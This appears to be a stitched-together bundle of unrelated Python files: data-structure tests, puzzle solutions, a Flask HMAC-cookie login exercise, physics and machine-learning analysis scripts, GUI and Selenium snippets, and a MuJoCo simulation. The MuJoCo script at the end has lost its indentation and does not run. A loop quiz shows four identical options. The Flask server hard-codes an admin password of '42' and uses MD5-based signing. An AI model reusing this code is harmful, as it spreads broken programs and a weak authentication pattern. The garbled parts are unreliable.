def teszt1() :
    # The hash function maps 'a'..'z' onto 0..25.
    assert (h.hash_fuggveny("a") == 0)
    assert (h.hash_fuggveny("z") == 25)
#
def teszt2() :
    # A freshly created table is a list with one bucket per letter.
    tabla = h.hash_tabla_letrehoz()
    assert (type(tabla) is list)
    assert (len(tabla) == 26)
    return tabla
#
def teszt3(tabla) :
    # Insert a few words (one duplicated) and check membership.
    h.hash_tabla_betesz(tabla, "alma")
    h.hash_tabla_betesz(tabla, "barack")
    h.hash_tabla_betesz(tabla, "alma")
    h.hash_tabla_betesz(tabla, "avokado")
    h.hash_tabla_betesz(tabla, "korte")
    assert (h.hash_tabla_benne_van(tabla, "alma") == True)
    assert (h.hash_tabla_benne_van(tabla, "barack") == True)
    assert (h.hash_tabla_benne_van(tabla, "avokado") == True)
#
def teszt4(tabla) :
    # Removing elements makes membership checks return False.
    h.hash_tabla_kivesz(tabla, "alma")
    h.hash_tabla_kivesz(tabla, "avokado")
    assert (h.hash_tabla_benne_van(tabla, "alma") == False)
    assert (h.hash_tabla_benne_van(tabla, "avokado") == False)
#
def main():
    """Run the hash-table test sequence, printing a separator between steps."""
    # assert True   # -> keeps running
    # assert False  # -> AssertionError
    elvalaszto_sor = "\n" + ("-" * 79) + "\n"
    print( elvalaszto_sor )
    teszt1()
    print( elvalaszto_sor )
    tabla = teszt2()
    print( elvalaszto_sor )
    teszt3(tabla)
    print( elvalaszto_sor )
    teszt4(tabla)
    print( elvalaszto_sor )
    # Fill the table with every letter, dump it, then empty it again.
    for c in "abcdefghijklmnopqrstuvwxyz" :
        h.hash_tabla_betesz(tabla, c)
    h.hash_tabla_debug(tabla)
    print( elvalaszto_sor )
    for c in "abcdefghijklmnopqrstuvwxyz" :
        h.hash_tabla_kivesz(tabla, c)
    h.hash_tabla_debug(tabla)
    print( elvalaszto_sor )
#
# -----------------------------------------------------------------------------
# Run the tests only when executed directly (not when imported).
if __name__ == "__main__" :
    main()
#
# -----------------------------------------------------------------------------
"""
# https://stackoverflow.com/questions/5142418/what-is-the-use-of-assert-in-python/5142453#5142453
assert condition =>
if not condition:
raise AssertionError()
#
# https://stackoverflow.com/questions/5142418/what-is-the-use-of-assert-in-python/5143044#5143044
assert condition =>
if __debug__:
if not condition:
raise AssertionError
#
debug mod kikapcsolasa:
python -O automatikus_tesztek.py
""" |
from sys import exit
import csv
# Simple phonebook demo: a dict lookup plus an append-only CSV log.
people = {
    "GABE": 12345678,
    "LUCAS": 23456789,
    "MIKE": 34567890,
    "EMMET": 87654321
}
# Demo lookup: dict membership is O(1).
if "GABE" in people:
    print(f"Found {people['GABE']}")
else:
    print("Not found")
name = input("name: ")
number = input("number: ")
# newline="" is required when handing a file to csv.writer; without it the
# module's own "\r\n" row endings get doubled on Windows (csv module docs).
with open("phonebook.csv", "a", newline="") as file:
    writer = csv.writer(file)
    writer.writerow((name, number))
|
import hmac
import os
from collections import defaultdict
from time import time
from base64 import b64encode, b64decode
from flask import Flask, request, make_response
app = Flask(__name__)
# Name of the cookie that carries the signed login token.
cookie_name = "LoginCookie"
# 20 random bytes as a per-user HMAC secret; the defaultdict creates one
# lazily the first time a username is seen.
def new_random(): return os.urandom(20)
secret_dict = defaultdict(new_random)
def compute_hmac(username, timestamp, user_type):
    """Return the uppercase hex HMAC tag binding username, timestamp and role.

    Fix: ``digestmod`` is passed explicitly -- hmac.new() has required it
    since Python 3.8 (the implicit MD5 default was removed). 'md5' is kept
    so tags match those the original code produced and existing cookies
    keep validating.
    """
    user_secret = secret_dict[username]
    return hmac.new(user_secret, bytes(username + str(timestamp) + user_type, 'utf-8'), digestmod='md5').hexdigest().upper()
@app.route("/login",methods=['POST'])
def login():
    """Issue a base64, HMAC-signed login cookie for the posted credentials."""
    # Get username and password from POST request
    username = request.form['username']
    password = request.form['password']
    # Check if username and password exist
    # NOTE(review): `|` is bitwise-or here; it works on bools but `or` is
    # the intended operator.
    if (not username) | (not password):
        return 'Invalid login data', 401
    # Make cookie
    cookie = ""
    timestamp = round(time())
    # Only the exact pair admin/42 receives the admin role.
    if username == 'admin' and password == '42':
        cookie = '{},{},com402,hw2,ex2,admin,{}'.format(username, timestamp, compute_hmac(username, timestamp, 'admin'))
    else:
        cookie = '{},{},com402,hw2,ex2,user,{}'.format(username, timestamp, compute_hmac(username, timestamp, 'user'))
    # Convert cookie to byte-like object and encode in base64
    cookie = b64encode(bytes(cookie, 'utf-8'))
    # Make response and attach the cookie
    response = make_response('Welcome {}!'.format(username))
    response.set_cookie(cookie_name, cookie)
    return response
@app.route("/auth",methods=['GET'])
def auth():
    """Validate the login cookie: 200 for admin, 201 for user, 403 otherwise."""
    cookie = request.cookies.get(cookie_name)
    if not cookie:
        return 'No cookie is present', 403
    cookie = b64decode(cookie).decode('utf-8')
    cookie_components = cookie.split(',')
    # Check that the structure is right
    if len(cookie_components) != 7:
        return 'Cookie has been tampered with', 403
    # Check HMAC is right
    username = cookie_components[0]
    timestamp = cookie_components[1]
    user_type = cookie_components[5]
    hmac_ = cookie_components[6]
    # compare_digest avoids leaking tag information through timing.
    if not hmac.compare_digest(hmac_, compute_hmac(username, timestamp, user_type)):
        return 'Cookie has been tampered with', 403
    if user_type == 'user':
        return 'Have a simple user', 201
    elif user_type == 'admin':
        return 'Have an admin', 200
    else:
        return 'Cookie has been tampered with', 403
if __name__ == '__main__':
    # Start the Flask development server with default host/port.
    app.run()
#!/usr/bin/python
import os
import bz2
import pdb
import settings
import json
import glob
msms = []
#files = filter(os.path.isfile, glob.glob("data/ripe/meta/meta_for_gr/" + "*"))
files = ['data/ripe/meta/meta-20150116.txt.bz2', 'data/ripe/meta/meta-20150406.txt.bz2', 'data/ripe/meta/meta-20150706.txt.bz2', 'data/ripe/meta/meta-20151005.txt.bz2',
'data/ripe/meta/meta-20160104.txt.bz2', 'data/ripe/meta/meta-20160411.txt.bz2', 'data/ripe/meta/meta-20160502.txt.bz2']
len_msms = []
# For each metadata dump: collect ids of all traceroute measurements and
# record the largest id seen (Python 2 script: bare print statements).
for fname in files:
    msms = []
    print fname
    with bz2.BZ2File(fname) as fi:
        try:
            for line in fi:
                # One JSON measurement description per line.
                mmt = json.loads(line)
                #if mmt['start_time'] < 1451606400: continue
                if mmt['type']['name'] != 'traceroute': continue
                msm_id = mmt['msm_id']
                msms.append(msm_id)
            msms = list(set(msms))
            print max(msms)
            len_msms.append(max(msms))
        except EOFError:
            # Truncated bz2 archive: skip this file and keep going.
            continue
print len_msms
|
import collections
def queensAttack(n, k, r_q, c_q, obstacles):
    """Count the squares a queen at (r_q, c_q) can attack on an n x n board.

    HackerRank "Queen's Attack II".  `k` is the obstacle count (unused, kept
    for signature compatibility).  `obstacles` may be any iterable of
    (row, col) pairs in 1-indexed coordinates: a list of pairs, or a dict
    keyed by (row, col) as the original comment intended.
    """
    # Normalize to a set for O(1) membership tests.  The previous version
    # indexed `obstacles[(nx + 1, ny + 1)]`, which raised KeyError for every
    # obstacle-free square when a dict was passed.
    blocked = {tuple(ob) for ob in obstacles}
    # The 8 queen directions: up, down, left, right, 4 diagonals.
    dx = [-1, 1, 0, 0, 1, -1, 1, -1]
    dy = [0, 0, -1, 1, 1, -1, -1, 1]
    count = 0
    x, y = r_q - 1, c_q - 1  # 0-indexed queen position
    for idx in range(8):
        nx = x + dx[idx]
        ny = y + dy[idx]
        # Walk along the ray until the board edge or the first obstacle.
        while 0 <= nx < n and 0 <= ny < n and (nx + 1, ny + 1) not in blocked:
            count += 1
            nx += dx[idx]
            ny += dy[idx]
    return count
|
# Nested-loop printing quiz.
# NOTE(review): leading whitespace in this file arrived mangled; the while-loop
# options below are reconstructed with `i += 1` in the *outer* loop (other
# placements never terminate) -- confirm against the original formatting, since
# that placement is exactly what such quiz options usually vary.
for i in range(1, 6):
    j = 0
    while j < i:
        print(j, end=" ")
        j += 1
    print("")
# Note: end = " " means that print() will put a space after what was printed instead of starting
# a new line.
# What will be the output of the code above?
# 1
# 1 2
# 1 2 3
# 1 2 3 4
# 1 2 3 4 5
# 0
# 0 1
# 0 1 2
# 0 1 2 3
# 0 1 2 3 4
# 1 2 3 4 5
# 1 2 3 4
# 1 2 3
# 1 2
# 1
# 0 1 2 3 4
# 0 1 2 3
# 0 1 2
# 0 1
# 0
# 2.Which of the following will have the identical output as the one above?
# Option A: range(0, i) prints 0..i-1 per row -- same rows as the loop above.
for i in range(1, 6):
    for j in range(0, i):
        print(j, end = " ")
    print("")
# Option B: range(0, i + 1) prints one extra value (0..i) per row.
for i in range(1, 6):
    for j in range(0, i + 1):
        print(j, end = " ")
    print("")
# Option C: range(i, 6) prints i..5 per row (descending row lengths).
for i in range(1, 6):
    for j in range(i, 6):
        print(j, end = " ")
    print("")
# Option D: range(i + 1, 6) prints i+1..5 per row.
for i in range(1, 6):
    for j in range(i + 1, 6):
        print(j, end = " ")
    print("")
# Which of the following will have the identical output as the one above?
i = 0
while i < 6:
    j = 0
    while j < i:
        print(j, end = " ")
        j += 1
    i += 1
    print("")
i = 0
while i < 6:
    j = 0
    while j < i:
        print(j, end = " ")
        j += 1
    i += 1
    print("")
i = 1
while i < 6:
    j = 0
    while j < i:
        print(j, end = " ")
        j += 1
    i += 1
    print("")
i = 1
while i < 6:
    j = 0
    while j < i:
        print(j, end = " ")
        j += 1
    i += 1
    print("")
|
#import sys
import numpy as np
import argparse
from socket import gethostname
#import streaker_calibration
import h5_storage
import elegant_matrix
import lasing
import config
import gaussfit
import image_and_profile as iap
#import tracking
#import analysis
import myplotstyle as ms
# Command-line interface: --noshow suppresses the interactive display,
# --save <dir> writes all figures out as PDFs at the end.
parser = argparse.ArgumentParser()
parser.add_argument('--noshow', action='store_true')
parser.add_argument('--save', type=str)
args = parser.parse_args()
config.fontsize = 9
ms.set_fontsizes(config.fontsize)
# Fixed seed so the reconstruction is reproducible between runs.
np.random.seed(0)
elegant_matrix.set_tmp_dir('~/tmp_elegant/')
ms.closeall()
# Map the machine we are running on to the location of the measurement data.
hostname = gethostname()
if hostname == 'desktop':
    data_dir2 = '/storage/data_2021-05-19/'
elif hostname == 'pc11292.psi.ch':
    data_dir2 = '/sf/data/measurements/2021/05/19/'
elif hostname == 'pubuntu':
    data_dir2 = '/mnt/data/data_2021-05-19/'
else:
    # Fail fast with a clear message instead of a NameError on the next line.
    raise ValueError('No data directory configured for host %r' % hostname)
# The 2021-05-18 shift data lives in the sibling directory.
data_dir1 = data_dir2.replace('19', '18')
# Calibration and measurement files recorded on the 2021-05-18 shift.
sc_file = data_dir1+'2021_05_18-22_11_36_Calibration_SARUN18-UDCP020.h5'
# Full lasing, but saturation
lasing_on_fileF = data_dir1+'2021_05_18-23_42_10_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_fileF = data_dir1+'2021_05_18-23_43_39_Lasing_False_SARBD02-DSCR050.h5'
# Full lasing begin
lasing_off_fileFB = data_dir1+'2021_05_18-21_02_13_Lasing_False_SARBD02-DSCR050.h5'
lasing_on_fileFB = data_dir1+'2021_05_18-20_52_52_Lasing_True_SARBD02-DSCR050.h5'
# Short pulse begin
lasing_on_fileSB = data_dir1+'2021_05_18-21_08_24_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_fileSB = data_dir1+'2021_05_18-21_06_46_Lasing_False_SARBD02-DSCR050.h5'
# Short pulse
lasing_on_fileS = data_dir1+'2021_05_18-23_47_11_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_fileS = data_dir1+'2021_05_18-23_48_12_Lasing_False_SARBD02-DSCR050.h5'
#Two color pulse I=3 A, k=2
lasing_on_file2 = data_dir1+'2021_05_18-21_41_35_Lasing_True_SARBD02-DSCR050.h5'
lasing_off_file2 = data_dir1+'2021_05_18-21_45_00_Lasing_False_SARBD02-DSCR050.h5'
blmeas_file = data_dir1+'119325494_bunch_length_meas.h5'
# Screen centroids and streaker offsets in metres, from prior calibrations.
screen_x00 = 4250e-6
screen_x02 = 898.02e-6
streaker_offset0 = 374e-6
streaker_offset2 = 364e-6
main_fig = ms.figure('Main lasing', figsize=(13, 7.68))
hspace, wspace = 0.35, 0.3
ms.plt.subplots_adjust(hspace=hspace, wspace=wspace)
subplot = ms.subplot_factory(3, 3, grid=False)
sp_ctr = 1
rec_ctr = 2
norm_factor = None
# One iteration per (lasing on, lasing off) measurement pair; each pair fills
# one column of the 3x3 main figure.
for ctr, (lasing_on_file, lasing_off_file, pulse_energy, screen_x0, streaker_offset, curr_lim, main_title) in enumerate([
        (lasing_on_fileFB, lasing_off_fileFB, 625e-6, screen_x02, streaker_offset2, 1.3e3, '(a) Standard mode'),
        (lasing_on_file2, lasing_off_file2, 180e-6, screen_x02, streaker_offset2, 1.5e3, '(b) Double pulse'),
        (lasing_on_fileSB, lasing_off_fileSB, 85e-6, screen_x02, streaker_offset2, 1.8e3, '(c) Short pulse'),
        ]):
    lasing_off_dict = h5_storage.loadH5Recursive(lasing_off_file)
    lasing_on_dict = h5_storage.loadH5Recursive(lasing_on_file)
    # Reconstruction settings shared by both images of this pair.
    n_streaker = 1
    beamline = 'Aramis'
    delta_gap = -57e-6
    tracker_kwargs = config.get_default_tracker_settings()
    recon_kwargs = config.get_default_gauss_recon_settings()
    slice_factor = 3
    charge = 180e-12
    subtract_median = False
    n_shots = 5
    recon_kwargs['charge'] = charge
    streaker = config.streaker_names['Aramis'][n_streaker]
    print('Streaker offset on/off: %.3f / %.3f mm ' % (lasing_on_dict['meta_data_begin'][streaker+':CENTER'], lasing_off_dict['meta_data_begin'][streaker+':CENTER']))
    las_rec_images = {}
    # "Lasing Off" is processed first: the "Lasing On" reconstruction reuses
    # its profile, slice definitions and reference y.
    for main_ctr, (data_dict, title) in enumerate([(lasing_off_dict, 'Lasing Off'), (lasing_on_dict, 'Lasing On')]):
        rec_obj = lasing.LasingReconstructionImages(screen_x0, beamline, n_streaker, streaker_offset, delta_gap, tracker_kwargs, recon_kwargs=recon_kwargs, charge=charge, subtract_median=subtract_median, slice_factor=slice_factor)
        #if ctr == rec_ctr:
        #    rec_obj.do_recon_plot = True
        rec_obj.add_dict(data_dict)
        if main_ctr == 1:
            rec_obj.profile = las_rec_images['Lasing Off'].profile
            rec_obj.ref_slice_dict = las_rec_images['Lasing Off'].ref_slice_dict
            rec_obj.ref_y = np.mean(las_rec_images['Lasing Off'].ref_y_list)
        rec_obj.process_data()
        avg_distance = rec_obj.gap/2. - abs(rec_obj.beam_offsets.mean())
        print('Average distances (um)', (avg_distance*1e6))
        las_rec_images[title] = rec_obj
        #rec_obj.plot_images('raw', title)
        #rec_obj.plot_images('tE', title)
    las_rec = lasing.LasingReconstruction(las_rec_images['Lasing Off'], las_rec_images['Lasing On'], pulse_energy, current_cutoff=curr_lim, norm_factor=norm_factor)
    las_rec.plot(n_shots=n_shots)
    if ctr == 0:
        # The first dataset fixes the normalization used for the later ones.
        norm_factor = las_rec.norm_factor
    if ctr == rec_ctr:
        # Keep references to the short-pulse reconstruction for later inspection.
        lasing_off_dict_fb = lasing_off_dict
        las_rec_fb = las_rec
        rec_obj_fb = las_rec_images['Lasing Off']
    ms.plt.figure(main_fig.number)
    title = main_title + ' ($E$=%i $\mu$J, $d$=%i $\mu$m)' % (round(las_rec.lasing_dict['Espread']['energy']*1e6), round(avg_distance*1e6))
    sp_off = subplot(ctr+1, xlabel='t (fs)', ylabel='E (MeV)', grid=False)
    sp_off.set_title(title, loc='left')
    sp_on = subplot(ctr+4, xlabel='t (fs)', ylabel='E (MeV)', grid=False)
    sp_on.set_title('(%s)' % 'def'[ctr], loc='left')
    sp_espread = subplot(ctr+7, xlabel='t (fs)', ylabel='P (GW)')
    sp_espread.set_title('(%s)' % 'ghi'[ctr], loc='left')
    # Route only the energy-spread panel into the main figure; dummy axes
    # swallow all the other plots LasingReconstruction.plot produces.
    sp_dummy = lasing.dummy_plot()
    plot_handles = (sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_dummy, sp_espread, sp_dummy)
    las_rec.plot(plot_handles=plot_handles, n_shots=n_shots)
    #sp_espread.get_legend().remove()
    if ctr == 0:
        espread_ylim = [-2, sp_espread.get_ylim()[1]]
    # All three power panels share the y-range taken from the first one.
    sp_espread.set_ylim(*espread_ylim)
    for key, sp in [('Lasing On', sp_on), ('Lasing Off', sp_off)]:
        rec_obj = las_rec_images[key]
        image_tE = rec_obj.images_tE[0]
        # Re-slice more coarsely (factor 6) just for the displayed image.
        rec_obj.slice_factor = 6
        rec_obj.slice_x()
        rec_obj.fit_slice()
        slice_dict = rec_obj.slice_dicts[0]
        #rec_obj.images_sliced[0].fit_slice(debug=True)
        image_tE.plot_img_and_proj(sp, plot_gauss=False, ylim=[-30e6, 25e6], slice_dict=slice_dict, slice_cutoff=curr_lim)
    # Time windows for per-pulse Gaussian fits (none for the first dataset,
    # which instead reports rms/FWHM of the whole power profile).
    if ctr == 0:
        gf_lims = []
        xx = las_rec.lasing_dict['Espread']['time']
        yy = las_rec.lasing_dict['Espread']['power']
        power_profile = iap.AnyProfile(xx, yy)
        print('Rms duration %.1f fs' % (power_profile.rms()*1e15))
        print('FWHM duration %.1f fs' % (power_profile.fwhm()*1e15))
    elif ctr == 1:
        gf_lims = ([30e-15, 45e-15], [60e-15, 80e-15])
    elif ctr == 2:
        gf_lims = ([40e-15, 55e-15],)
    for gf_ctr, gf_lim in enumerate(gf_lims):
        if gf_ctr == 0:
            ms.figure('Gf %s' % main_title)
            gf_sp_ctr = 1
        sp = subplot(gf_sp_ctr, xlabel='t (fs)', ylabel='P (GW)')
        gf_sp_ctr += 1
        xx = las_rec.lasing_dict['Espread']['time']
        yy = las_rec.lasing_dict['Espread']['power']
        mask = np.logical_and(xx > gf_lim[0], xx < gf_lim[1])
        gf = gaussfit.GaussFit(xx[mask], yy[mask])
        gf.plot_data_and_fit(sp)
        sp.set_title('Gaussfit %i $\sigma$ %.1f fs m %.1f fs' % (gf_ctr, (gf.sigma*1e15), gf.mean*1e15))
        print('Gaussian duration %.1f fs' % (gf.sigma*1e15))
        print('Gaussian mean %.1f fs' % (gf.mean*1e15))
        #sp_espread.plot(gf.xx*1e15, gf.reconstruction/1e9, label='%.1f' % (gf.sigma*1e15), color='red', lw=3)
    #if gf_lims:
    #    sp_espread.legend(title='$\sigma$ (fs)')

if not args.noshow:
    ms.show()
if args.save:
    ms.saveall(args.save, hspace, wspace, ending='.pdf')
|
from selenium.webdriver.common.by import By
class DashboardPageLocators(object):
    """Selenium locators for elements on the dashboard page."""
    STATISTIC_HEADER = (By.XPATH, '//h3[1]')
    # The Intercom support-chat widget lives in its own iframe; switch to it
    # before using the two locators below.
    INTERCOM_IFRAME = (By.XPATH, '//iframe[@class="intercom-launcher-frame"]')
    INTERCOM_OPEN_CHAT_BUTTON = (By.CLASS_NAME, 'intercom-avatar')
    INTERCOM_CHAT = (By.CLASS_NAME, 'intercom-conversations')
    CURRENCY_SYMBOL = (By.XPATH, '//sup')
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
import sys
# NOTE(review): wildcard import; QApplication and QWidget come from QtGui in PyQt4.
from PyQt4.QtGui import *

# Create an PyQT4 application object.
a = QApplication(sys.argv)
# The QWidget widget is the base class of all user interface objects in PyQt4.
w = QWidget()
# Set window size.
w.resize(320, 240)
# Set window title
w.setWindowTitle("Hello World!")
# Show window
w.show()
# Enter the Qt event loop; exit the process with the loop's return code.
sys.exit(a.exec_())
|
#!/usr/bin/env python
# coding: utf-8
# # Importing modules
# __________________
# The modules involves Numpy, Pandas, Matplotlib, Seaborn
# In[ ]:
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns #Visualizations
from matplotlib import pyplot as plt
get_ipython().magic(u'matplotlib inline')
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls", "../input"]).decode("utf8"))
# Any results you write to the current directory are saved as output.
# # Spliting values in variables
# In[ ]:
# Load the Kaggle Titanic splits; gender_submission doubles as test labels.
train_data = pd.read_csv("../input/train.csv")
test_data = pd.read_csv("../input/test.csv")
files_listing = test_data.PassengerId
test_labels = pd.read_csv('../input/gender_submission.csv')

# # Printing the training data
# In[ ]:
train_data.head()

# # Striping down the data
# ---
# The data contains a lot of useless information. The columns containing these data will need to be dropped.
# Classifiers do not take non integral values as input and so needs to be converted. So Sex column in manipulated
# In[ ]:
labels_test = test_labels.values
labels_test = labels_test[:, 1]
test_data = test_data.drop(['Name', 'SibSp', 'Parch', 'Ticket', 'Fare', 'Cabin', 'Embarked'], axis=1)
# Impute missing ages with the *training* mean so train and test are treated consistently.
test_data.Age = test_data.Age.fillna(np.mean(train_data.Age))
test_data.Sex = test_data.Sex.apply(lambda x: 1 if x == 'male' else 0)
test_data = test_data.values
test_data = test_data[:, 1:]  # drop the PassengerId column
features_test = test_data

# In[ ]:
train_data = train_data.drop(['Name', 'SibSp', 'Parch', 'Ticket', 'Fare', 'Cabin', 'Embarked'], axis=1)

# In[ ]:
train_data['Age'] = train_data['Age'].fillna(np.mean(train_data.Age))
train_data['Sex'] = train_data['Sex'].apply(lambda x: 1 if x == 'male' else 0)
train_data.head()

# Converting data from dataframe into numpy array and segragating features and labels.
# In[ ]:
# Getting all the values from the dataframe to the numpy array
features_all = train_data.values
# Dropping the PassengerId column and splitting the features and labels
labels_all = features_all[:, 1]
features_all = features_all[:, 2:]

# # Showdown of Classifiers
# All the algorithms are tested and the accuracy score is generated
# In[ ]:
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC, LinearSVC, NuSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

classifiers = [
    KNeighborsClassifier(),
    AdaBoostClassifier(),
    RandomForestClassifier(),
    GaussianNB(),
    LinearDiscriminantAnalysis(),
    GradientBoostingClassifier(),
    DecisionTreeClassifier()
]
uni, cnt = np.unique(labels_test, return_counts=True)
res_cols = ['Name', 'Accuracy']
result_rows = []  # one [name, accuracy] frame per classifier
print("Actual Value of the result ", dict(zip(uni, cnt)))
for clf in classifiers:
    clf.fit(features_all, labels_all)
    print("-" * 50)
    name = clf.__class__.__name__
    print(name)
    pred_train = clf.predict(features_test)
    acc = accuracy_score(labels_test, pred_train)
    print("Result ->", acc * 100, '%')
    result_rows.append(pd.DataFrame([[name, acc * 100]], columns=res_cols))
    print('-' * 50)
# DataFrame.append was deprecated and removed in pandas 2.0; build the
# result frame once with concat instead of appending row by row.
result = pd.concat(result_rows, ignore_index=True)

# # Showdown of SVM's
# All the SVM are tuned with different kernel and C parameter tuning and the accuracy is generated
# In[ ]:
classifiers = [
    LinearSVC(),
    NuSVC(),
    SVC(kernel="rbf", C=0.25),
    SVC(kernel="linear", C=0.25),
    SVC(kernel="rbf", C=1),
    SVC(kernel="linear", C=1),
    SVC(kernel="rbf", C=5),
    SVC(kernel="linear", C=5)
]
uni, cnt = np.unique(labels_test, return_counts=True)
print("Actual Value of the result ", dict(zip(uni, cnt)))
for clf in classifiers:
    clf.fit(features_all, labels_all)
    print("-" * 50)
    name = clf.__class__.__name__
    print(name)
    pred_train = clf.predict(features_test)
    acc = accuracy_score(labels_test, pred_train)
    print("Result ->", acc * 100, '%')
    print('-' * 50)

# # Comparision plot for Algorithms
# In[ ]:
sns.set_color_codes("muted")
sns.barplot(x='Accuracy', y="Name", data=result, color='g')
plt.xlabel("Accuracy")
plt.ylabel("Classifier Name")
plt.title("Accuracy Graph")
plt.show()

# In[ ]:

# In[ ]:
|
import sys
def print_chess_board(board):
    """Write the board to stdout, highest-index row first (White's view)."""
    for rank in reversed(board):
        for square in rank:
            sys.stdout.write(square)
        sys.stdout.write("\n")
def calculate_next_move(distance_to_end):
    """Pick the knight move for the remaining (d_row, d_col) offset to the target.

    Table-driven replacement for the original 20-branch if/elif chain:
    exact offsets are looked up directly; larger offsets fall back to a
    coarse "step toward the target" rule.  Returns (0, 0) when already at
    the target or when no rule applies.
    """
    moves = {
        # One move to finish: the offset is itself a legal knight move.
        (2, 1): (2, 1), (1, 2): (1, 2), (2, -1): (2, -1), (1, -2): (1, -2),
        (-2, 1): (-2, 1), (-1, 2): (-1, 2), (-2, -1): (-2, -1), (-1, -2): (-1, -2),
        # Two moves to finish.
        (0, -2): (2, -1), (0, 2): (2, 1), (-2, 0): (-1, 2), (2, 0): (1, 2),
        (1, 1): (2, -1), (-1, 1): (-2, -1), (-1, -1): (1, -2), (1, -1): (2, 1),
        # Three moves to finish.
        (0, 1): (2, 1), (0, -1): (2, -1), (1, 0): (1, 2), (-1, 0): (-1, 2),
    }
    delta = (distance_to_end[0], distance_to_end[1])
    if delta in moves:
        return moves[delta]
    # Far away: take a big step in the right horizontal direction.
    if delta[0] > 2:
        return (2, 1)
    if delta[0] < -2:
        return (-2, 1)
    return (0, 0)
def move_knight(current_position, move):
    """Return the position reached by applying `move` to `current_position`."""
    return tuple(coord + delta for coord, delta in zip(current_position, move))
def knights_attack(start, end, obstacles):
    """Animate a knight walking from `start` to `end` on an 8x8 board.

    Coordinates are 0-indexed (row, col).  The board is printed after every
    move.  NOTE(review): the `obstacles` parameter is accepted but never
    used anywhere in the body.
    """
    knight_pos = start
    # Remaining (d_row, d_col) offset from the knight to the target.
    distance_to_end = tuple(t[1] - t[0] for t in zip(knight_pos, end))
    chess_board = [["[ ]" for y in range(8)] for x in range(8)]
    chess_board[knight_pos[0]][knight_pos[1]] = "[♘]"
    chess_board[end[0]][end[1]] = "[👑]"
    print_chess_board(chess_board)
    move_num = 0
    # The 20-move cap guards against the heuristic cycling forever.
    while distance_to_end != (0, 0) and move_num < 20:
        move_num += 1
        print(f"\n Move {move_num}")
        chess_board[knight_pos[0]][knight_pos[1]] = "[ ]"
        knight_pos = move_knight(knight_pos, calculate_next_move(distance_to_end))
        chess_board[knight_pos[0]][knight_pos[1]] = "[♘]"
        distance_to_end = tuple(t[1] - t[0] for t in zip(knight_pos, end))
        print_chess_board(chess_board)
    print("\n Done!")


# Demo run.
knights_attack((1,1), (1,2), [])
#! /usr/bin/python3
import unittest
from math import sqrt
def factorpairs(n):
    """Return the sums a+b over every factor pair a*b == n (each pair once).

    Order: the perfect-square pair first (if any), then pairs by ascending
    smaller factor, and finally the trivial pair 1*n.
    """
    if n == 1:
        return [2]
    pair_sums = []
    root = int(sqrt(n))
    if root * root == n:
        pair_sums.append(root * 2)
        root -= 1
    for small in range(2, root + 1):
        if n % small == 0:
            pair_sums.append(small + int(n / small))
    pair_sums.append(n + 1)
    return pair_sums


def is_stealthy(n):
    """True when two distinct factor-pair sums of `n` differ by exactly 1."""
    sums = factorpairs(n)
    return any(
        abs(sums[left] - sums[right]) == 1
        for left in range(len(sums) - 1)
        for right in range(left + 1, len(sums))
    )
class TestIs_Stealthy(unittest.TestCase):
    """Worked examples for the 'stealthy numbers' kata."""

    def test_ex1(self):
        self.assertEqual(is_stealthy(36), True, 'example 1')

    def test_ex2(self):
        self.assertEqual(is_stealthy(12), True, 'example 2')

    def test_ex3(self):
        self.assertEqual(is_stealthy(6), False, 'example 3')


# NOTE(review): not guarded by `if __name__ == '__main__':`, so importing this
# module also runs the suite.
unittest.main()
|
#!/usr/bin/env python3
from mujoco_py import load_model_from_path, MjSim, MjViewer
import numpy as np
import os
import plotly.graph_objs as go
from plotly.offline import plot
from pymuscle.hill_type import (
contractile_element_force_length_curve as ce_length_curve,
contractile_element_force_velocity_curve as ce_velocity_curve,
)
from os.path import dirname
path = dirname(os.path.abspath(__file__)) + "/assets/ballonstring.xml"
model = load_model_from_path(path)
sim = MjSim(model)
viewer = MjViewer(sim)
t = 0
total_steps = 15000
inc = 5.0 / total_steps
time_step = 0.002
forces = []
sensor_forces = []
lengths = []
act_forces = []
initial_stiffness = None
total_forces = []
prev_length = None
for i in range(1, total_steps + 1):
sim.step()
if i == 1:
print("Rest Length", sim.model.tendon_lengthspring)
# sim.model.tendon_lengthspring[0] = sim.model.tendon_lengthspring[0] * 0.65
# import pdb
# pdb.set_trace()
if not initial_stiffness:
initial_stiffness = sim.model.tendon_stiffness[0]
# sim.model.tendon_stiffness[0] = sim.model.tendon_stiffness[0] + 10.0
# sim.model.body_mass[2] = sim.model.body_mass[2] + 0.1
# print("Lengths", sim.data.ten_length)
cur_length = sim.data.ten_length[0]
# print("Rest Length", sim.model.tendon_lengthspring)
rest_length = sim.model.tendon_lengthspring[0]
# print("Stiffness", sim.model.tendon_stiffness)
cur_stiffness = sim.model.tendon_stiffness[0]
tension = 0
# Hooke's Law
if cur_length > rest_length:
delta = cur_length - rest_length
frac = cur_length / rest_length
tension = delta * cur_stiffness
sim.model.tendon_stiffness[0] = initial_stiffness * frac
# print("Tension", tension)
# print("Sensor 1", sim.data.sensordata[:3])
# print("Sensor 1 mag", sensor_force)
# print("Sensor 2", sim.data.sensordata[3:])
# print("Sensor 2 mag", np.linalg.norm(sim.data.sensordata[3:]))
# sim.data.ctrl[0] = sim.data.ctrl[0] - 0.001
# if i > 6000:
# sim.data.ctrl[0] = 0.0
if i > 3000:
length_factor = ce_length_curve(rest_length, cur_length)
if not prev_length:
prev_length = cur_length
velocity_factor = ce_velocity_curve(
rest_length,
cur_length,
prev_length,
time_step
)
sim.data.ctrl[0] = -(length_factor * velocity_factor)
forces.append(tension)
norm_length = cur_length / rest_length
lengths.append(norm_length)
act_force = np.abs(sim.data.actuator_force[0])
act_forces.append(act_force)
sensor_force = np.linalg.norm(sim.data.sensordata[:3])
sensor_forces.append(sensor_force)
total_force = act_force + tension
total_forces.append(total_force)
prev_length = cur_length
